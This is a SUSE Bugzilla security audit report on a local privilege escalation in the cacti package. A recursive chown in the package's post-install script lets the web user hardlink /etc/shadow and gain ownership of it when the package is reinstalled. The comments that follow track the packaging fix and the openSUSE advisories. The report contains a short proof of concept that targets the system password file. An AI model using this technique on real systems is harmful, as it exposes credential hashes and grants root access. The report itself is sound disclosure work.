Bug 1154087 - AUDIT-FIND: cacti: LPE from wwwrun to root
AUDIT-FIND: cacti: LPE from wwwrun to root
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Audits
unspecified
Other Other
: P5 - None : Normal
: ---
Assigned To: Lars Vogdt
Security Team bot
:
Depends on:
Blocks: 1154062
  Show dependency treegraph
 
Reported: 2019-10-15 13:50 UTC by Johannes Segitz
Modified: 2020-07-28 01:14 UTC (History)
4 users (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Johannes Segitz 2019-10-15 13:50:39 UTC
The problematic snippet is:
172 %post
173 chown -R %{apache_user}:%{apache_group} %{cacti_dir}/rra

On systems with fs.protected_hardlinks=0 this allows wwwrun to escalate to root. POC:

sh-5.0$ id
uid=30(wwwrun) gid=8(www) groups=8(www)
sh-5.0$ pwd
/srv/www/cacti/rra
sh-5.0$ ln /etc/shadow .
sh-5.0$ ls -lah
total 16K
drwxr-xr-x  2 wwwrun www    4.0K Oct 15 15:46 .
drwxr-xr-x 15 root   root   4.0K Oct 15 15:43 ..
-rwxr-xr-x  1 wwwrun www     170 Sep 29 20:36 .htaccess
-rw-r-----  3 root   shadow 1.3K Oct 15 14:02 shadow

As root: 
zypper in -f cacti

sh-5.0$ ls -lah /etc/shadow
-rw-r----- 3 wwwrun www 1.3K Oct 15 14:02 /etc/shadow
Comment 1 Johannes Segitz 2019-11-08 08:55:52 UTC
We will not assign CVEs for these issues and documented the risk here:
https://www.suse.com/support/kb/doc/?id=7024245

Still we would like to get rid of the recursive chown. Can you just package the directories as the correct user or remove the chown via a different way?
Comment 2 Andreas Stieger 2020-04-11 13:34:04 UTC
maintainers seem inactive, see bug 1164675 and bug 1169215
Comment 3 Andreas Stieger 2020-04-11 13:36:47 UTC
David is inactive (e-mail bounces)
Comment 4 Lars Vogdt 2020-05-11 14:43:34 UTC
jumping in: I'm not sure why this chown was there in the past. At least for now i removed the chown and added an entry in the files section that gives the directory ownership to the apache user.

https://build.opensuse.org/request/show/802716 contains the fix.
Comment 5 OBSbugzilla Bot 2020-07-14 10:10:12 UTC
This is an autogenerated message for OBS integration:
This bug (1154087) was mentioned in
https://build.opensuse.org/request/show/820850 15.1+15.2+Backports:SLE-12 / cacti+cacti-spine
Comment 6 Johannes Segitz 2020-07-20 12:17:08 UTC
fixed in Factory, thanks
Comment 7 Swamp Workflow Management 2020-07-25 22:13:19 UTC
openSUSE-SU-2020:1060-1: An update that fixes four vulnerabilities is now available.

Category: security (moderate)
Bug References: 1115436,1154087,1173090
CVE References: CVE-2020-11022,CVE-2020-11023,CVE-2020-13625,CVE-2020-14295
Sources used:
openSUSE Leap 15.2 (src):    cacti-1.2.13-lp152.2.3.1, cacti-spine-1.2.13-lp152.2.3.1
openSUSE Leap 15.1 (src):    cacti-1.2.13-lp151.3.12.1, cacti-spine-1.2.13-lp151.3.12.1
Comment 8 Swamp Workflow Management 2020-07-25 22:15:13 UTC
openSUSE-SU-2020:1060-1: An update that fixes four vulnerabilities is now available.

Category: security (moderate)
Bug References: 1115436,1154087,1173090
CVE References: CVE-2020-11022,CVE-2020-11023,CVE-2020-13625,CVE-2020-14295
Sources used:
openSUSE Leap 15.2 (src):    cacti-1.2.13-lp152.2.3.1, cacti-spine-1.2.13-lp152.2.3.1
openSUSE Leap 15.1 (src):    cacti-1.2.13-lp151.3.12.1, cacti-spine-1.2.13-lp151.3.12.1
SUSE Package Hub for SUSE Linux Enterprise 12 (src):    cacti-1.2.13-11.1, cacti-spine-1.2.13-8.1
Comment 9 Swamp Workflow Management 2020-07-28 01:14:15 UTC
openSUSE-SU-2020:1106-1: An update that fixes four vulnerabilities is now available.

Category: security (moderate)
Bug References: 1115436,1154087,1173090
CVE References: CVE-2020-11022,CVE-2020-11023,CVE-2020-13625,CVE-2020-14295
JIRA References: 
Sources used:
openSUSE Backports SLE-15-SP1 (src):    cacti-1.2.13-bp151.4.12.1, cacti-spine-1.2.13-bp151.4.12.1